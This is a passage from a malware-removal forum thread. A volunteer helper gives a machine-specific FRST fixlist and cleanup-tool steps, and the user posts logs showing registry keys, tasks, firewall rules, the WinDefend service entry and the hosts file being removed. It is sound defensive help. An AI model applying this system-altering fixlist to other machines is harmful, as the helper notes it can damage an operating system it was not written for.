Description: Activation context generation failed for "c:\program files (x86)\eset\eset online scanner\ESETSmartInstaller.exe".Error in manifest or policy file "" on line .
A component version required by the application conflicts with another component version already active.
Conflicting components are:.
Component 1: C:\Windows\WinSxS\manifests\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_fa3b1e3d17594757.manifest.
Component 2: C:\Windows\WinSxS\manifests\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.18837_none_41e855142bd5705d.manifest.

Error: (04/11/2017 06:46:59 AM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/10/2017 07:57:35 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/10/2017 07:57:35 PM) (Source: SideBySide) (EventID: 35) (User: )
Description: Activation context generation failed for "C:\Program Files (x86)\Microsoft Office\root\Office16\lync.exe.Manifest".Error in manifest or policy file "C:\Program Files (x86)\Microsoft Office\root\Office16\UccApi.DLL" on line 1.
Component identity found in manifest does not match the identity of the component requested.
Reference is UccApi,processorArchitecture="AMD64",type="win32",version="16.0.0.0".
Definition is UccApi,processorArchitecture="x86",type="win32",version="16.0.0.0".
Please use sxstrace.exe for detailed diagnosis.

Error: (04/10/2017 07:53:23 PM) (Source: VSS) (EventID: 8194) (User: )
Description: Volume Shadow Copy Service error: Unexpected error querying for the IVssWriterCallback interface.  hr = 0x80070005, Access is denied.
.
This is often caused by incorrect security settings in either the writer or requestor process.

Operation:
   Gathering Writer Data

Context:
   Writer Class Id: {e8132975-6f93-4464-a53e-1050253ae220}
   Writer Name: System Writer
   Writer Instance ID: {fdfd987f-623e-4408-a604-488e495676a8}

Error: (04/10/2017 05:29:39 PM) (Source: Office 2016 Licensing Service) (EventID: 0) (User: )
Description: Event-ID 0

System errors:
=============
Error: (04/10/2017 09:05:10 PM) (Source: Schannel) (EventID: 4119) (User: NT AUTHORITY)
Description: The following fatal alert was received: 20.

Error: (04/09/2017 09:00:28 PM) (Source: Tcpip) (EventID: 4199) (User: )
Description: The system detected an address conflict for IP address 192.168.1.103 with the system
having network hardware address 00-6B-9E-91-74-6D. Network operations on this system may
be disrupted as a result.

Error: (04/09/2017 07:53:51 PM) (Source: Service Control Manager) (EventID: 7011) (User: )
Description: A timeout (30000 milliseconds) was reached while waiting for a transaction response from the ShellHWDetection service.

Error: (04/09/2017 06:45:02 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {D085A4AB-CAB1-4729-9DF8-FCEEDDBD19E4} did not register with DCOM within the required timeout.

Error: (04/09/2017 05:49:47 PM) (Source: DCOM) (EventID: 10010) (User: )
Description: The server {9E175B6D-F52A-11D8-B9A5-505054503030} did not register with DCOM within the required timeout.

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The HP Support Solutions Framework Service service terminated unexpectedly.  It has done this 1 time(s).

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Search service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 30000 milliseconds: Restart the service.

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The Cyberlink RichVideo Service(CRVS) service terminated unexpectedly.  It has done this 1 time(s).

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7031) (User: )
Description: The Windows Live ID Sign-in Assistant service terminated unexpectedly.  It has done this 1 time(s).  The following corrective action will be taken in 10000 milliseconds: Restart the service.

Error: (04/09/2017 05:49:17 PM) (Source: Service Control Manager) (EventID: 7034) (User: )
Description: The SAMSUNG Mobile Connectivity Service service terminated unexpectedly.  It has done this 1 time(s).

CodeIntegrity:
===================================
  Date: 2012-08-15 20:12:34.270
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2012-08-15 20:12:34.192
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\ComboFix\catchme.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.791
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

  Date: 2011-02-27 19:01:15.775
  Description: Windows is unable to verify the image integrity of the file \Device\HarddiskVolume2\Users\KEKLR\AppData\Local\Temp\OnlineScanner\Anti-Virus\fsgk.sys because file hash could not be found on the system. A recent hardware or software change might have installed a file that is signed incorrectly or damaged, or that might be malicious software from an unknown source.

==================== Memory info ===========================

Processor: Intel® Core™2 Duo CPU T6600 @ 2.20GHz
Percentage of memory in use: 72%
Total physical RAM: 3999.19 MB
Available physical RAM: 1112.07 MB
Total Virtual: 7996.56 MB
Available Virtual: 4961.82 MB

==================== Drives ================================

Drive c: () (Fixed) (Total:285.17 GB) (Free:196.29 GB) NTFS ==>[system with boot components (obtained from drive)]
Drive d: (RECOVERY) (Fixed) (Total:12.72 GB) (Free:2.12 GB) NTFS ==>[system with boot components (obtained from drive)]

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 298.1 GB) (Disk ID: 2169E425)
Partition 1: (Active) - (Size=199 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=285.2 GB) - (Type=07 NTFS)
Partition 3: (Not Active) - (Size=12.7 GB) - (Type=07 NTFS)

==================== End of Addition.txt ============================



#28 Android 8888

Android 8888

    SWI Malware Tracker

  • Helper
  • PipPipPipPipPip
  • 865 posts

Posted 11 April 2017 - 06:44 PM

Hello krtate.

The Malwarebytes Anti-Rootkit log is clean so it appears the rootkit is gone.

Please proceed with the instructions below.


Perform the following fix with FRST.

NOTICE: This script was written specifically for this user, for use on this particular machine. Running this on another machine may cause damage to your operating system.

Press the Windows key Windows_Logo_key.gif+ r on your keyboard at the same time. This will open the RUN BOX.
Type Notepad and click the OK button.
Please copy the entire contents of the code box below. To do this highlight the contents of the box and right click on it and select Copy.
Paste this into the open Notepad.
 

Start
CreateRestorePoint:
CloseProcesses:
HKU\S-1-5-18\...A8F59079A8D5}\localserver32: <==== ATTENTION
SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
2017-04-09 18:57 - 2017-02-09 12:33 - 1732864 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll
Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsInstall&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsPlugin&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
CMD: ipconfig /flushdns
EmptyTemp:
Hosts:
End


Save the file as fixlist.txt in to the same folder where FRST64 is placed which is the computer's Desktop.
Now, right-click the FRST64 icon and select Run as administrator to start the tool.
Click the Fix button only once and wait.
When finished FRST will generate a log on the Desktop named fixlog.txt. Please post its entire content in your next reply.

If for some reason the tool needs a restart, please make sure you let the system restart normally. After that let the tool complete its run.



Next,

Please download AdwCleaner by Xplode and save it to your Desktop.

  • Close all open programs and internet browsers.
  • Right-click on the icon and select Run as administrator to start the tool.
  • Click Yes to accept any security warnings that may appear.
  • Click I Agree on the disclaimer to accept the Terms of Use.
  • Click the Scan button to start the scan and wait for the process to complete.
  • Click the Logfile button and the report will open in Notepad.
  • NOTE: If you get an error message, it means that nothing was found. Exit from AdwCleaner.
  • Click on the Clean button and follow the prompts.
  • A log file will automatically open after the scan has finished and the PC has rebooted.
  • Please post the content of that log file in your next reply.
  • You can find the log file at C:\AdwCleaner[Cn].txt (n is a number, the highest number is the most recent).

 

 

Next,

Please download Junkware Removal Tool and save it to your Desktop.

  • Please close your security software to avoid potential conflicts.
  • Right-click on the icon and select Run as administrator to start the tool.
  • The tool will open and check for updates. You will see the Disclaimer.
  • Press any key to continue and start scanning your system.
  • Please be patient as this can take a while to complete, depending on your system's specifications.
  • On completion, a log (JRT.txt) is saved to your Desktop and will automatically open.

Please post the contents of JRT.txt into your next reply.



Next,

The Malwarebytes version that you have installed is outdated.

 

Please read the instructions below and make a clean install of Malwarebytes from version 2 to version 3.
 

 

Download MBAM-clean and save it to your computer Desktop.
 
Right-click on mbam-clean.exe icon and select Run as administrator to start the tool.
It will ask you to reboot the machine - please do so.
Run the MBAM-clean tool again and reboot when complete. << NOTE: DO NOT miss this step.

If you have lost the activation licence key information it can be located here
 

 

Download Malwarebytes version 3 from here and save it to your Desktop or anywhere else on your system since you know where is located.

Double click on the installer and follow the prompts to install the program. If necessary select the blue Help tab for video instructions.

When the install completes and is updated do the following:

  • Start Malwarebytes;
  • On the left pane select Settings;
  • Then select the Protection tab;
  • Scroll down to Scan Options and ensure Scan for Rootkits and Scan within archives are both on.
  • Go back to DashBoard and select the blue Scan Now tab.
  • When the scan completes deal with any found entries.
  • Select Export Summary and then Text File (*.txt). Give a name to the log and save it;
  • Please copy and paste the entire content of that log in your next reply.

 

In your next reply please post the contents of the following logs:
fixlog.txt produced by FRST;
AdwCleaner clean log;
JRT.txt log;
Malwarebytes log.

Let me know how is your computer running at this point. Do you still have issues about changing the Home Page in Internet Explorer?

Thank you.

Android 8888


Android 8888
 

Website: http://android8888.comlu.com

 

Tavira - Here's where I live!

 

Please read the Instructions for posting requested logs and the article "So how did I get infected in the first place?"
 
Our help is free, but if you wish to help keep these forums running please consider a donation; Please see This Topic for details.


#29 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 07:34 PM

Does it matter that my computer restarted and downloaded updates before I do all the steps above?



#30 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 08:36 PM

Fix result of Farbar Recovery Scan Tool (x64) Version: 15-03-2017
Ran by KEKLR (11-04-2017 21:27:06) Run:2
Running from C:\Users\KEKLR\Desktop
Loaded Profiles: KEKLR (Available Profiles: KEKLR)
Boot Mode: Normal
==============================================

fixlist content:
*****************
Start
 CreateRestorePoint:
 CloseProcesses:
 HKU\S-1-5-18\...A8F59079A8D5}\localserver32: <==== ATTENTION
 SearchScopes: HKLM -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 SearchScopes: HKLM -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 SearchScopes: HKLM-x32 -> DefaultScope {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 SearchScopes: HKLM-x32 -> {6A1806CD-94D4-4689-BA73-E35EA1EA9990} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSSEDF&pc=MSSE
 BHO-x32: hpBHO Class -> {ABD3B5E1-B268-407B-A150-2641DAB8D898} -> C:\Program Files (x86)\Common Files\Homepage Protection\HomepageProtection.dll [2009-06-08] (AOL Products)
 S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2013-05-27] (Microsoft Corporation)
 2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\AtStart.txt
 2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\DSwitch.txt
 2010-01-02 05:15 - 2010-01-02 05:15 - 0000000 _____ () C:\Users\KEKLR\AppData\Local\QSwitch.txt
 2017-04-09 18:57 - 2017-02-09 12:33 - 1732864 _____ (Microsoft Corporation) C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll
 Task: {145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} - System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -d C:\Windows\SysWOW64 -c /AppMode=DOWNLOADMANAGER /SummerUpdate /PackageType=Free /ProductType=Free
 Task: {7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} - System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsInstall&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:notoffered;alreadyoffered
 Task: {8529AC47-189E-4DDF-B06C-D355E6130614} - System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => Iexplore.exe hxxp://ui.skype.com/ui/0/5.5.0.117/en/abandoninstall?source=lightinstaller&amp;page=tsPlugin&amp;installinfo=google-toolbar:notoffered;toolbarpresent,google-chrome:offered-installed;madedefault
 FirewallRules: [{93464EED-A641-4CB5-8DC6-92BFDF7A1E14}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
 FirewallRules: [{DC01FAA2-E761-4009-AD0C-43E643AD9B75}] => (Allow) C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
 C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe
 CMD: ipconfig /flushdns
 EmptyTemp:
 Hosts:
 End
*****************

Restore point was successfully created.
Processes closed successfully.
HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5}\localserver32 => key not found.
HKU\S-1-5-18\Software\Classes\CLSID\{AB8902B4-09CA-4bb6-B78D-A8F59079A8D5} => key removed successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key removed successfully
HKCR\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\\DefaultScope => value restored successfully
HKLM\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key removed successfully
HKCR\Wow6432Node\CLSID\{6A1806CD-94D4-4689-BA73-E35EA1EA9990} => key not found.
HKLM\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{ABD3B5E1-B268-407B-A150-2641DAB8D898} => key removed successfully
HKCR\Wow6432Node\CLSID\{ABD3B5E1-B268-407B-A150-2641DAB8D898} => key not found.
HKLM\System\CurrentControlSet\Services\WinDefend => key removed successfully
WinDefend => service removed successfully
C:\Users\KEKLR\AppData\Local\AtStart.txt => moved successfully
C:\Users\KEKLR\AppData\Local\DSwitch.txt => moved successfully
C:\Users\KEKLR\AppData\Local\QSwitch.txt => moved successfully
C:\Users\KEKLR\AppData\Local\Temp\dllnt_dump.dll => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{145E92C4-1FF3-4DB0-AFBD-FA4A35F22A85} => key removed successfully
C:\Windows\System32\Tasks\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{DDBABCCF-0E03-48B8-AAC5-512D701FC2BA} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{7B40D90F-4DA6-41EA-BF23-8C81ED9BF51F} => key removed successfully
C:\Windows\System32\Tasks\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C8C31B20-64FD-4571-A75B-8134EA7E188D} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Plain\{8529AC47-189E-4DDF-B06C-D355E6130614} => key removed successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tasks\{8529AC47-189E-4DDF-B06C-D355E6130614} => key removed successfully
C:\Windows\System32\Tasks\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => moved successfully
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\{C834371F-AFA0-4D39-B5C0-C65F016AC328} => key removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{93464EED-A641-4CB5-8DC6-92BFDF7A1E14} => value removed successfully
HKLM\SYSTEM\CurrentControlSet\services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\\{DC01FAA2-E761-4009-AD0C-43E643AD9B75} => value removed successfully
C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe => moved successfully

========= ipconfig /flushdns =========

Windows IP Configuration

Successfully flushed the DNS Resolver Cache.

========= End of CMD: =========

C:\Windows\System32\Drivers\etc\hosts => moved successfully
Hosts restored successfully.

=========== EmptyTemp: ==========

BITS transfer queue => 8388608 B
DOMStore, IE Recovery, AppCache, Feeds Cache, Thumbcache, IconCache => 7577015 B
Java, Flash, Steam htmlcache => 492 B
Windows/system/drivers => 22437481 B
Edge => 0 B
Chrome => 0 B
Firefox => 0 B
Opera => 0 B

Temp, IE cache, history, cookies, recent:
Users => 0 B
Default => 0 B
Public => 0 B
ProgramData => 0 B
systemprofile => 128 B
systemprofile32 => 128 B
LocalService => 0 B
NetworkService => 15916 B
KEKLR => 19494588 B

RecycleBin => 0 B
EmptyTemp: => 55.2 MB temporary data Removed.

================================

The system needed a reboot.

==== End of Fixlog 21:28:00 ====



#31 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 08:50 PM

# AdwCleaner v6.045 - Logfile created 11/04/2017 at 21:44:04
# Updated on 28/03/2017 by Malwarebytes
# Database : 2017-04-11.1 [Server]
# Operating System : Windows 7 Home Premium Service Pack 1 (X64)
# Username : KEKLR - KEKLR-PC
# Running from : C:\Users\KEKLR\Desktop\adwcleaner_6.045.exe
# Mode: Clean
# Support : https://www.malwarebytes.com/support

 

***** [ Services ] *****

 

***** [ Folders ] *****

[-] Folder deleted: C:\Users\KEKLR\AppData\LocalLow\HPAppData
[-] Folder deleted: C:\Program Files (x86)\Coupons

***** [ Files ] *****

[-] File deleted: C:\Users\Public\Desktop\eBay.lnk
[-] File deleted: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\eBay.lnk

***** [ DLL ] *****

 

***** [ WMI ] *****

 

***** [ Shortcuts ] *****

 

***** [ Scheduled Tasks ] *****

 

***** [ Registry ] *****

[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.Protector
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.Protector.1
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho.1
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib
[-] Key deleted: HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.Protector
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.Protector.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorBho.1
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib
[#] Key deleted on reboot: [x64] HKLM\SOFTWARE\Classes\protector_dll.ProtectorLib.1
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{761F6A83-F007-49E4-8EAC-CDB6808EF06F}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{76C45B18-A29E-43EA-AAF8-AF55C2E1AE17}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{7CD74AFF-3433-4E34-92E2-D98DFDB30754}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{96EF404C-24C7-43D0-9096-4CCC8BB7CCAC}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{97720195-206A-42AE-8E65-260B9BA5589F}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{97D69524-BB57-4185-9C7F-5F05593B771A}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{986F7A5A-9676-47E1-8642-F41F8C3FCF82}
[-] Key deleted: HKLM\SOFTWARE\Classes\CLSID\{B18788A4-92BD-440E-A4D1-380C36531119}
[-] Key deleted: HKLM\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{9522B3FB-7A2B-4646-8AF6-36E7F593073C}
[-] Key deleted: HKU\.DEFAULT\Software\Auslogics
[-] Key deleted: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\YahooPartnerToolbar
[-] Key deleted: HKU\S-1-5-21-3698744866-2675293530-421701469-1001\Software\Auslogics
[-] Key deleted: HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3698744866-2675293530-421701469-1001\Software\AVG Security Toolbar
[#] Key deleted on reboot: HKU\S-1-5-18\Software\Auslogics
[#] Key deleted on reboot: HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: HKCU\Software\Auslogics
[#] Key deleted on reboot: [x64] HKCU\Software\Microsoft\Internet Explorer\InternetRegistry\REGISTRY\USER\S-1-5-21-3698744866-2675293530-421701469-1001\Software\AVG Security Toolbar
[#] Key deleted on reboot: [x64] HKCU\Software\YahooPartnerToolbar
[#] Key deleted on reboot: [x64] HKCU\Software\Auslogics

***** [ Web browsers ] *****

[-] [C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: aol.com
[-] [C:\Users\KEKLR\AppData\Local\Google\Chrome\User Data\Default\Web data] [Search Provider] Deleted: ask.com

*************************

:: "Tracing" keys deleted
:: Winsock settings cleared

*************************

C:\AdwCleaner\AdwCleaner[C0].txt - [3792 Bytes] - [11/04/2017 21:44:04]
C:\AdwCleaner\AdwCleaner[S0].txt - [3763 Bytes] - [11/04/2017 21:41:01]

########## EOF - C:\AdwCleaner\AdwCleaner[C0].txt - [3938 Bytes] ##########



#32 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 09:04 PM

unkware Removal Tool (JRT) by Malwarebytes
Version: 8.1.3 (04.10.2017)
Operating System: Windows 7 Home Premium x64
Ran by KEKLR (Administrator) on Tue 04/11/2017 at 21:53:16.40
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

 

File System: 15

Successfully deleted: C:\Users\KEKLR\AppData\Local\{1C6B0370-E376-4EFE-B002-30C4ABD7D16C} (Empty Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\{38EAE2D8-58EA-4A27-BDE4-838EB929F2E8} (Empty Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\{6AC0772D-B6C5-434A-B3F6-A1E7372D11C8} (Empty Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\{80825A96-AAD6-4DA4-A02D-313BE9C4B36A} (Empty Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\{A5ABE803-5426-49F3-AD6B-318D95D3937D} (Empty Folder)
Successfully deleted: C:\Program Files (x86)\Common Files\homepage protection (Folder)
Successfully deleted: C:\Program Files (x86)\GUTAF36.tmp (File)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4VQNA5CH (Temporary Internet Files Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F2PYKCEU (Temporary Internet Files Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K514I03L (Temporary Internet Files Folder)
Successfully deleted: C:\Users\KEKLR\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RC1U67T2 (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\4VQNA5CH (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\F2PYKCEU (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\K514I03L (Temporary Internet Files Folder)
Successfully deleted: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\RC1U67T2 (Temporary Internet Files Folder)

 

Registry: 3

Successfully deleted: HKLM\Software\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A} (Registry Key)
Successfully deleted: HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Search\\SearchAssistant (Registry Value)

 

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Scan was completed on Tue 04/11/2017 at 21:56:53.44
End of JRT log
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~



#33 krtate

krtate

    Advanced Member

  • Full Member
  • PipPipPip
  • 170 posts

Posted 11 April 2017 - 09:42 PM

Malwarebytes
www.malwarebytes.com

-Log Details-
Scan Date: 4/11/17
Scan Time: 10:21 PM
